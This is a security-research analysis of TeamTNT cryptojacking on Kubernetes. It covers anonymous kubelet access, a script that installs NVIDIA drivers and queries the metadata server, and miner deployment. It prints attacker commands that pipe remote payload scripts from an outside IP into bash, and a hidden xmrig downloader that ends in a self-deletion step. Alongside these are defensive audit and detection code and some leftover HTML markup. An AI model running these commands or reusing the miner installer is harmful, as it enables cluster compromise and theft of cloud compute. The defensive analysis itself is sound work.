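Cryptojacking on the fly: TeamTNT using NVIDIA drivers to mine cryptocurrency

Overview

Kubernetes deployments have become a target for attackers as a means of compromising cloud environments, taking control of workloads and using the power of the cloud to carry out unauthorized tasks. Earlier research highlighted how the TeamTNT threat group attacks Kubernetes deployments at scale [1]. TeamTNT is known for attacking insecure and vulnerable Kubernetes deployments in order to further enumerate cloud infrastructure [2], infiltrate organizations' dedicated environments and turn them into attack launchpads. In this article we present a new module introduced by TeamTNT that leverages NVIDIA GPU capabilities for advanced mining operations by installing the relevant drivers on compromised pods running in cluster nodes. To be clear, TeamTNT does not exploit any security vulnerability in the NVIDIA drivers.

Understanding the attack model: Kubernetes for cryptomining operations

It is important to understand TeamTNT's attack model first, before dissecting how it works end to end. The details are shown in Figure 1.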

TeamTNT-cryptomining-fig1.png

Figure 1: TeamTNT Kubernetes attack model.

Figure 2 shows the complete workflow.

 

TeamTNT-cryptomining-fig2.png

Figure 2: Workflow.

Let's look at the infection model first:

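  • Exploiting an insecure kubelet. It has recently been established that attackers target the kubelet component of Kubernetes installations because of insecure configurations and inherent vulnerabilities.

    According to the details provided in the Kubernetes documentation [3], the kubelet is:

    '...an agent that runs on each node [4] in the [Kubernetes] cluster. It makes sure that containers [5] are running in a Pod [6].

    'The kubelet takes a set of PodSpecs that are provided through various mechanisms and ensures that the containers described in those PodSpecs are running and healthy. The kubelet doesn't manage containers which were not created by Kubernetes.'

    The TeamTNT attack takes advantage of default Kubernetes installations because the kubelet, as configured, runs insecurely. As a result, by default anyone can authenticate to the kubelet, because it runs with the anonymous-auth flag set to true.
  • Compromising pods configured in the node. Once the attacker has compromised the kubelet, they start compromising the pods configured in the node. To do so, the attacker triggers remote command execution by exploiting a privilege escalation flaw. For example, to take full control of a container (pod) in the node, the attacker first obtains root privileges on that container. Once root privileges are established, the compromised container is used to trigger lateral movement or to target other containers (pods) in the node.
  • Downloading malicious payloads. Once a pod is compromised, the attacker downloads malicious payloads from a remote location to install advanced payloads or tools. This lets the attacker use different tools as required.
  • Updating packages on the compromised pod. The compromised pod environment is enhanced by installing new packages, such as NVIDIA drivers, to boost GPU capabilities. This helps the attacker weaponize the compromised pod (container) and use the underlying hardware for operations.
  • Executing cryptomining operations. Once the pod has been updated with the additional drivers, the cryptominer is activated and the related processes are started to perform cryptomining operations. The enhanced capabilities of the pod are used for mining, which passes the cost of mining on to the owner of the cloud infrastructure.
  • Triggering C&C communication. The malicious code communicates with the C&C server and exfiltrates sensitive data from the compromised pod.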
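
The first step above depends on the kubelet accepting anonymous requests. The following audit is an added example, not code from the original article or from TeamTNT: it computes the effective kubelet authentication and authorization settings from a command line plus an optional KubeletConfiguration in JSON form, and also checks the authorization mode, which goes one step beyond the anonymous-auth flag named in the text. The sample command lines, file paths and configurations are constructed, and the defaults encoded here are those of the Kubernetes kubelet reference and should be verified for the version in use.

```python
import json
import shlex

# Defaults as documented in the Kubernetes kubelet reference (verify for your
# version): the command-line flag defaults are permissive, while the defaults
# applied to a --config file are not.
FLAG_DEFAULTS = {"anonymous": True, "mode": "AlwaysAllow"}
FILE_DEFAULTS = {"anonymous": False, "mode": "Webhook"}
BOOL_FLAGS = {"anonymous-auth"}          # boolean flags never consume the next token
TRUE_VALUES = {"1", "t", "true"}

# Constructed sample inputs (not taken from a real cluster).
WEAK_CMDLINE = "/usr/bin/kubelet --config=/var/lib/kubelet/config.json --anonymous-auth=true"
WEAK_CONFIG = json.dumps({
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": False}, "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
})
HARDENED_CMDLINE = "/usr/bin/kubelet --config=/var/lib/kubelet/config.json"
HARDENED_CONFIG = json.dumps({
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": False}, "webhook": {"enabled": True}},
    "authorization": {"mode": "Webhook"},
})


def parse_flags(cmdline):
    """Return {flag: value} for '--flag=value', '--flag value' and bare '--flag'."""
    flags = {}
    tokens = shlex.split(cmdline)[1:]
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("--"):
            name, sep, value = tok[2:].partition("=")
            if not sep:
                if name in BOOL_FLAGS:
                    # '--anonymous-auth false' still means true: the stray
                    # 'false' is a positional argument, not the flag's value.
                    value = "true"
                elif i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                    value = tokens[i + 1]
                    i += 1
            flags[name] = value
        i += 1
    return flags


def effective_settings(cmdline, config_json=None):
    """Merge config-file values with flags; flags take precedence."""
    cfg = json.loads(config_json) if config_json else {}
    base = FILE_DEFAULTS if config_json else FLAG_DEFAULTS
    anon = cfg.get("authentication", {}).get("anonymous", {}).get("enabled", base["anonymous"])
    mode = cfg.get("authorization", {}).get("mode", base["mode"])
    flags = parse_flags(cmdline)
    if "anonymous-auth" in flags:
        anon = flags["anonymous-auth"].lower() in TRUE_VALUES
    if "authorization-mode" in flags:
        mode = flags["authorization-mode"]
    return {"anonymous": anon, "mode": mode}


def audit(cmdline, config_json=None):
    """Return a list of findings; an empty list means neither weakness is present."""
    s = effective_settings(cmdline, config_json)
    findings = []
    if s["anonymous"]:
        findings.append("anonymous-auth is enabled: unauthenticated requests are accepted")
    if s["mode"] == "AlwaysAllow":
        findings.append("authorization-mode is AlwaysAllow: every request is authorized")
    return findings


if __name__ == "__main__":
    for label, cmd, cfg in (("weak", WEAK_CMDLINE, WEAK_CONFIG),
                            ("hardened", HARDENED_CMDLINE, HARDENED_CONFIG)):
        print(label, audit(cmd, cfg) or "no findings")
```

In the weak sample the config file disables anonymous access but the flag re-enables it, which is why the flag and the file have to be evaluated together.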

 

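Research analysis

In this section we present more details on TeamTNT's use of NVIDIA drivers.

Remote server hosting packages

A remote server hosting various Kubernetes infection tools (scripts) and modules was discovered, as shown in Figure 3.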

TeamTNT-cryptomining-fig3.png

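Figure 3: Server hosting different Kubernetes infection tools (scripts) and modules.

You can see different types of shell scripts listed in the directory. Installation scripts such as install-NVIDIA-drivers.sh and a directory named gpu were identified among the listed resources.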

TeamTNT-cryptomining-fig4.png

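Figure 4: Directory structure highlighting the presence of bash scripts.

The directory structure shown in Figure 4 highlights the presence of bash scripts, one of which is nvidia.sh.

Dissecting the NVIDIA installation script

The nvidia.sh script is used to download and install NVIDIA drivers to enhance the capabilities of the underlying hardware. Let's analyse the script.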

TeamTNT-cryptomining-fig5.png

Figure 5: Nvidia.sh script.

When the string is decoded with the base64 utility, the message 'NVIDIA Installer' is displayed, as shown below.

TeamTNT-cryptomining-fig6.png

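Figure 6: Message displayed when the string is decoded.

The script fetches the following NVIDIA packages:

Package: description

  • nvidia-headless-450 [7]: This package is just an umbrella for a group of other packages; it has no description. Sample descriptions of packages in the group:
      • NVIDIA binary OpenGL/GLX configuration library
      • Shared files used by the NVIDIA libraries
      • NVIDIA libcompute package
      • NVIDIA video decoding runtime libraries
  • nvidia-driver-450: NVIDIA driver support for the 450 series
  • nvidia-compute-utils-450: This package provides utility binaries for parallel general-purpose computing use cases with the NVIDIA driver
  • nvidia-cuda-toolkit: NVIDIA tools for debugging CUDA applications running on Linux and QNX

In addition, different variants of the script are shown.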

TeamTNT-cryptomining-fig7.png

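Figure 7: Different variants of the script.

Let's dissect this script for more information.

Querying the metadata server

The installation script is designed to fetch metadata in order to install new modules and packages on the compromised system. Every VM stores its metadata on a centralized metadata server, which can be accessed directly without any additional authorization. The metadata is needed to install new scripts and packages in an automated way. For this, the installation script needs additional VM information provided by the metadata server. Typically, VMs have access to the metadata by default. TeamTNT uses the following curl commands to query the metadata server from a compromised VM hosted in Google Cloud: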

```bash
function get_metadata_value() {
    curl --retry 5 \
        -s \
        -f \
        -H "Metadata-Flavor: Google" \
        "http://metadata/computeMetadata/v1/$1"
}
function get_attribute_value() {
    get_metadata_value "instance/attributes/$1"
}
```

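If you analyse the curl command above, it sets the -H parameter with Metadata-Flavor: Google (a 'key: value' pair). The HTTP request header indicates to the metadata server that the VM needs the metadata to perform specific operations and that the request does not come from an insecure source. This tactic is very effective because the VM is already compromised and the trust boundary is broken.

Installing Linux kernel headers

A Linux distribution consists of the kernel, kernel headers and additional modules. Kernel headers are used to explicitly define the different device interfaces, highlighting how functions are defined in source files. Kernel headers let the compiler check that functions are used legitimately and correctly by validating the function signatures (return values and parameters) available in the header files. The script installs the Linux headers package, which provides the kernel headers for the specific kernel version (check uname -a). Kernel headers provide the interfaces that help kernel modules communicate with and access the hardware. The kernel header installation code used in the script is shown below: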

```bash
function install_linux_headers() {
    # Install linux headers. Note that the kernel version might be changed after
    # installing the gvnic version. For example: 4.19.0-8-cloud-amd64 ->
    # 4.19.0-9-cloud-amd64. So we install the kernel headers for each driver
    # installation.
    echo "install linux headers: linux-headers-$(uname -r)"
    sudo apt install -y linux-headers-"$(uname -r)" || exit 1
}
```

 

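Self-deletion and file cleanup

After installing the drivers on the compromised system, the script has a self-deletion capability that removes all traces of itself from the system after successful execution. The following command is executed: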

rm -f nvidia.sh 2>/dev/null 1>/dev/null
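
The behaviours described so far (the metadata query with the Metadata-Flavor header, the kernel header install, the NVIDIA package install and the deletion of the script that was just run) can be correlated per pod. The detector below is an added example, not code from the original article: the JSON event format, the pod names and the alert threshold are hypothetical, and the sample events are constructed.

```python
import json
import re
from collections import defaultdict

# Constructed process-execution events, one JSON object per line, in a
# hypothetical format that a container runtime sensor might emit.
SAMPLE_EVENTS = """\
{"pod": "web-7d9f", "cmd": "bash nvidia.sh"}
{"pod": "web-7d9f", "cmd": "curl --retry 5 -s -f -H 'Metadata-Flavor: Google' http://metadata/computeMetadata/v1/instance/attributes/nvidia-driver-gcs-path"}
{"pod": "web-7d9f", "cmd": "sudo apt install -y linux-headers-4.19.0-9-cloud-amd64"}
{"pod": "web-7d9f", "cmd": "apt-get install -y nvidia-headless-450 nvidia-driver-450 nvidia-compute-utils-450"}
{"pod": "web-7d9f", "cmd": "rm -f nvidia.sh"}
{"pod": "ml-train-0", "cmd": "apt-get install -y nvidia-cuda-toolkit"}
{"pod": "batch-1", "cmd": "rm -f cleanup.sh"}
"""

# Stateless indicators: each one alone is common in legitimate GPU workloads.
RULES = {
    "metadata_query": re.compile(
        r"(?=.*Metadata-Flavor:\s*Google)(?=.*computeMetadata/v1/)"),
    "kernel_headers": re.compile(
        r"\bapt(?:-get)?\b.*\binstall\b.*\blinux-headers-"),
    "gpu_driver": re.compile(
        r"\bapt(?:-get)?\b.*\binstall\b.*"
        r"\bnvidia-(?:headless|driver|compute-utils|cuda-toolkit)\b"
        r"|NVIDIA-Linux-x86_64-\S+\.run"),
}
# Stateful indicator: a shell script is executed and later removed in the same pod.
RUN_SCRIPT = re.compile(r"^(?:sudo\s+)?(?:(?:ba)?sh\s+|\./)(\S+\.sh)\b")
RM_SCRIPT = re.compile(r"^rm\s+(?:-\w+\s+)*(\S+\.sh)\b")


def basename(path):
    return path.rsplit("/", 1)[-1]


def detect(lines, threshold=3):
    """Return {pod: sorted behaviours} for pods showing >= threshold behaviours."""
    seen = defaultdict(set)       # pod -> behaviours observed
    executed = defaultdict(set)   # pod -> basenames of scripts that were run
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        pod, cmd = event["pod"], event["cmd"]
        for name, rule in RULES.items():
            if rule.search(cmd):
                seen[pod].add(name)
        ran = RUN_SCRIPT.search(cmd)
        if ran:
            executed[pod].add(basename(ran.group(1)))
        removed = RM_SCRIPT.search(cmd)
        # Only count a deletion when the same script was executed earlier.
        if removed and basename(removed.group(1)) in executed[pod]:
            seen[pod].add("self_delete")
    return {pod: sorted(b) for pod, b in seen.items() if len(b) >= threshold}


if __name__ == "__main__":
    for pod, behaviours in detect(SAMPLE_EVENTS).items():
        print(f"ALERT {pod}: {', '.join(behaviours)}")
```

Requiring several behaviours in the same pod keeps a legitimate GPU workload that only installs a CUDA package, such as the constructed ml-train-0 pod, below the threshold.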

 

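OS-specific driver installation

The script can install OS-specific drivers by checking the operating system installed in the pod (container). The main routine is as follows: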

```bash
main() {
    install_linux_headers
    # shellcheck source=/opt/deeplearning/driver-version.sh disable=SC1091
    source "${DL_PATH}/driver-version.sh"
    export DRIVER_GCS_PATH
    # Custom GCS driver location via instance metadata.
    DRIVER_GCS_PATH=$(get_attribute_value nvidia-driver-gcs-path)
    if [[ "${OS_IMAGE_FAMILY}" == "${OS_DEBIAN9}" || "${OS_IMAGE_FAMILY}" == "${OS_DEBIAN10}" ]]; then
        install_driver_debian
    elif [[ "${OS_IMAGE_FAMILY}" == "${OS_UBUNTU1804}" ]]; then
        install_driver_ubuntu
    fi
}
```

 

NVIDIA driver deployment on Ubuntu

The script uses the function install_driver_ubuntu() to check for and install the NVIDIA drivers for the Ubuntu operating system. The details are as follows:

```bash
# For Ubuntu OS
function install_driver_ubuntu() {
    echo "DRIVER_UBUNTU_DEB: ${DRIVER_UBUNTU_DEB}"
    echo "DRIVER_UBUNTU_PKG: ${DRIVER_UBUNTU_PKG}"
    if [[ -z "${DRIVER_GCS_PATH}" ]]; then
        DRIVER_GCS_PATH="gs://dl-platform-public-nvidia/${DRIVER_UBUNTU_DEB}"
    fi
    echo "Downloading driver from GCS location and install: ${DRIVER_GCS_PATH}"
    set +e
    gsutil -q cp "${DRIVER_GCS_PATH}" "${DRIVER_UBUNTU_DEB}"
    set -e
    # Download driver via http if GCS failed.
    if [[ ! -f "${DRIVER_UBUNTU_DEB}" ]]; then
        driver_url_path="https://developer.download.nvidia.com/compute/cuda/${DRIVER_UBUNTU_CUDA_VERSION}/local_installers/${DRIVER_UBUNTU_DEB}"
        download_driver_via_http "${driver_url_path}" "${DRIVER_UBUNTU_DEB}"
    fi
    if [[ ! -f "${DRIVER_UBUNTU_DEB}" ]]; then
        driver_url_path="https://us.download.nvidia.com/tesla/${DRIVER_VERSION}/${DRIVER_UBUNTU_DEB}"
        download_driver_via_http "${driver_url_path}" "${DRIVER_UBUNTU_DEB}"
    fi
    if [[ ! -f "${DRIVER_UBUNTU_DEB}" ]]; then
        echo "Failed to find drivers!"
        exit 1
    fi
    wget -nv https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/cuda-ubuntu1804.pin
    sudo mv cuda-ubuntu1804.pin /etc/apt/preferences.d/cuda-repository-pin-600
    dpkg -i "${DRIVER_UBUNTU_DEB}" || {
        echo "Failed to install ${DRIVER_UBUNTU_DEB}..exit"
        exit 1
    }
    apt-key add /var/cuda-repo-*/*.pub || apt-key add /var/nvidia-driver*/*.pub || {
        echo "Failed to add apt-key...exit"
        exit 1
    }
    sudo apt update
    sudo apt remove -y "${DRIVER_UBUNTU_PKG}"
    sudo apt -y autoremove && sudo apt install -y "${DRIVER_UBUNTU_PKG}"
    rm -rf "${DRIVER_UBUNTU_DEB}" cuda-update1804.pin
}
```

 

NVIDIA driver deployment on Debian

The script uses the function install_driver_debian() to check for and install the NVIDIA drivers for the Debian operating system. The details are as follows:

```bash
# For Debian-like OS
function install_driver_debian() {
    echo "DRIVER_VERSION: ${DRIVER_VERSION}"
    local driver_installer_file_name="driver_installer.run"
    local nvidia_driver_file_name="NVIDIA-Linux-x86_64-${DRIVER_VERSION}.run"
    if [[ -z "${DRIVER_GCS_PATH}" ]]; then
        DRIVER_GCS_PATH="gs://nvidia-drivers-us-public/tesla/${DRIVER_VERSION}"
    fi
    local driver_gcs_file_path=${DRIVER_GCS_PATH}/${nvidia_driver_file_name}
    echo "Downloading driver from GCS location and install: ${driver_gcs_file_path}"
    set +e
    gsutil -q cp "${driver_gcs_file_path}" "${driver_installer_file_name}"
    set -e
    # Download driver via http if GCS failed.
    if [[ ! -f "${driver_installer_file_name}" ]]; then
        driver_url_path="http://us.download.nvidia.com/tesla/${DRIVER_VERSION}/${nvidia_driver_file_name}"
        download_driver_via_http "${driver_url_path}" "${driver_installer_file_name}"
    fi
    if [[ ! -f "${driver_installer_file_name}" ]]; then
        echo "Failed to find drivers!"
        exit 1
    fi
    chmod +x ${driver_installer_file_name}
    sudo ./${driver_installer_file_name} --dkms -a -s --no-drm --install-libglvnd
    rm -rf ${driver_installer_file_name}
}
```

 

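Non-GCS API support: direct download over HTTP

Another feature added to the installation script is fetching the NVIDIA drivers directly from the Internet over an HTTP channel. The attacker uses this option when the GCS API cannot be used to obtain the drivers. Think of it as a fallback path for installing the NVIDIA drivers directly. The code highlighted below confirms this: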

function download_driver_via_http() {
    local driver_url_path=$1
    local downloaded_file=$2
    echo "Could not use Google Cloud Storage APIs to download drivers. Attempting to download them directly from Nvidia."
    echo "Downloading driver from URL: ${driver_url_path}"
    wget -nv "${driver_url_path}" -O "${downloaded_file}" || {
        echo 'Download driver via Web failed!' &&
        rm -f "${downloaded_file}" &&
        echo "${downloaded_file} deleted"
    }
}

 

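Installing the cryptominer software

The init.sh file fetches the different Kubernetes payloads, which are downloaded from a remote host to the compromised pod with the curl command, as shown below: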

# curl http://45.9.148.XXX/cmd/init.sh | bash
curl http://45.9.148.XXX/cmd/Kubernetes_root_PayLoad_1.sh | bash
curl http://45.9.148.XXX/cmd/Kubernetes_root_PayLoad_2.sh | bash
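
The following detection sketch is an added example, not code from the original analysis or from the scripts it examines. It matches recorded container command lines against behaviours this section shows: a pipe-to-shell fetch over plain HTTP from an IP literal, the silent `--dkms -s` driver installer, the renamed downloaders `wd1`/`wdl`/`cd1`/`cdl`, and a hidden directory under `/usr/sbin`. The event format, pod names, rule names and 192.0.2.x addresses are assumptions constructed for illustration.

```python
import posixpath
import re
import shlex
from collections import defaultdict

# Fetch over plain HTTP from an IPv4 literal, piped straight into a shell.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget)\b[^|]*\bhttp://\d{1,3}(?:\.\d{1,3}){3}[^|]*\|\s*(?:ba|da|z)?sh\b"
)
# Dot-directory under /usr/sbin, like the /usr/sbin/.configure/ staging path.
HIDDEN_SBIN = re.compile(r"/usr/sbin/\.[^/\s]+/")
# Alternate downloader names that the analysed script probes for.
RENAMED_DOWNLOADERS = {"wd1", "wdl", "cd1", "cdl"}
WRAPPERS = {"sudo", "nohup", "env"}


def _tokens(segment):
    """Shell-style tokenisation; fall back to a plain split on broken quoting."""
    try:
        return shlex.split(segment)
    except ValueError:
        return segment.split()


def _commands(cmdline):
    """Yield (program basename, args) for each pipeline or list segment.

    Separators inside quotes are not handled; good enough for triage.
    """
    for segment in re.split(r"\|\||&&|[|;]", cmdline):
        toks = _tokens(segment)
        while toks and toks[0] in WRAPPERS:
            toks = toks[1:]
        if toks:
            yield posixpath.basename(toks[0]), toks[1:]


def match_rules(cmdline):
    """Return the sorted names of the rules that fire on one command line."""
    hits = set()
    if PIPE_TO_SHELL.search(cmdline):
        hits.add("pipe_to_shell_from_ip")
    if HIDDEN_SBIN.search(cmdline):
        hits.add("hidden_dir_under_usr_sbin")
    for program, args in _commands(cmdline):
        if program in RENAMED_DOWNLOADERS:
            hits.add("renamed_downloader")
        # A self-extracting .run installer building a kernel module silently
        # is not something an application pod should ever execute.
        if program.endswith(".run") and "--dkms" in args and "-s" in args:
            hits.add("silent_kernel_driver_install")
    return sorted(hits)


def triage(events, min_rules=2):
    """Map pod -> rules hit, keeping pods with at least min_rules distinct rules."""
    per_pod = defaultdict(set)
    for pod, cmdline in events:
        per_pod[pod].update(match_rules(cmdline))
    return {pod: sorted(r) for pod, r in per_pod.items() if len(r) >= min_rules}


# Constructed sample events (pod name, command line); not from a real incident.
SAMPLE_EVENTS = [
    ("payments-7d9f", "curl http://192.0.2.10/cmd/Kubernetes_root_PayLoad_1.sh | bash"),
    ("payments-7d9f", "sudo ./NVIDIA-Linux-x86_64-000.00.run --dkms -a -s --no-drm --install-libglvnd"),
    ("payments-7d9f", "wdl -q http://192.0.2.10/bin/xmrig.tar.gz -O /usr/sbin/.configure/xmrig.tar.gz"),
    ("payments-7d9f", "/usr/sbin/.configure/xmrig -h"),
    ("web-5c4b", "curl -fsSL https://pkg.example.com/install.sh | sh"),
    ("web-5c4b", "wget -nv https://pkg.example.com/app.tar.gz -O /tmp/app.tar.gz"),
    ("batch-1a2b", "tar -xvf /var/backups/data.tar.gz -C /srv/data"),
]

if __name__ == "__main__":
    for pod, rules in triage(SAMPLE_EVENTS).items():
        print(pod, rules)
```

Requiring two or more distinct rules per pod keeps a single noisy match, such as a legitimate installer fetched over HTTP, from paging anyone on its own.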

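The code shown below highlights how TeamTNT installs the cryptominer on a compromised pod running in an active node of the Kubernetes cluster. The module shows how the xmrig.tgz file is downloaded and how the cryptominer is installed on the compromised pod. The function is part of the Kubernetes_temp_PayLoad_2.sh file, which defines the different payloads to install.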

<span style="color:#333333"><span style="background-color:#f7f7f9">function DOWNLOAD_FILE(){
echo "[*] Downloading advanced xmrig to /usr/sbin/.configure/xmrig.tar.gz"
if type wget 2>/dev/null 1>/dev/null; then wget -q $XMR_1_BIN_URL -O /usr/sbin/.configure/xmrig.tar.gz
elif type wd1 2>/dev/null 1>/dev/null; then wd1 -q $XMR_1_BIN_URL -O /usr/sbin/.configure/xmrig.tar.gz
elif type wdl 2>/dev/null 1>/dev/null; then wdl -q $XMR_1_BIN_URL -O /usr/sbin/.configure/xmrig.tar.gz
elif type curl 2>/dev/null 1>/dev/null; then curl -s $XMR_1_BIN_URL -o /usr/sbin/.configure/xmrig.tar.gz
elif type cd1 2>/dev/null 1>/dev/null; then cd1 -s $XMR_1_BIN_URL -o /usr/sbin/.configure/xmrig.tar.gz
elif type cdl 2>/dev/null 1>/dev/null; then cdl -s $XMR_1_BIN_URL -o /usr/sbin/.configure/xmrig.tar.gz
elif type bash 2>/dev/null 1>/dev/null; then C_hg_DLOAD $XMR_1_BIN_URL > /usr/sbin/.configure/xmrig.tar.gz
fi
tar -xvf /usr/sbin/.configure/xmrig.tar.gz -C /usr/sbin/.configure/ 2>/dev/null
rm -f /usr/sbin/.configure/xmrig.tar.gz 2>/dev/null 1>/dev/null
chmod +x /usr/sbin/.configure/xmrig
if [ -f "/usr/sbin/.configure/xmrigMiner" ];then chmod +x /usr/sbin/.configure/xmrigMiner; fi
/usr/sbin/.configure/xmrig -h 2>/dev/null 1>/dev/null
CHECK_XMRIG=$?
if [[ "$CHECK_XMRIG" != "0" ]]; then
if [ -f /usr/sbin/.configure/xmrig ]
then echo "WARNING: /usr/sbin/.configure/xmrig is not functional"
if [ -f "/usr/sbin/.configure/xmrig" ];then rm -f /usr/sbin/.configure/xmrig; fi
if [ -f "/usr/sbin/.configure/xmrigMiner" ];then rm -f /usr/sbin/.configure/xmrigMiner; fi
else
echo "WARNING: /usr/sbin/.configure/xmrig was removed"
if [ -f "/usr/sbin/.configure/xmrigMiner" ];then rm -f /usr/sbin/.configure/xmrigMiner; fi
fi
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
—-- Truncated —
<span style="color:#48484c"><span style="color:#48484c">tar </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">xvf </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">C </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span> <span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span 
style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">tar</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">gz </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">chmod </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">x </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> chmod </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">+</span></span><span style="color:#48484c"><span style="color:#48484c">x </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">h </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span> <span style="color:#195f91"><span style="color:#195f91">1</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#48484c"><span style="color:#48484c">CHECK_XMRIG</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">=</span></span><span style="color:#48484c"><span style="color:#48484c">$</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">?</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[[</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"$CHECK_XMRIG"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">!=</span></span> <span style="color:#dd1144"><span style="color:#dd1144">"0"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">]];</span></span> <span style="color:#1e347b"><span style="color:#1e347b">then</span></span>
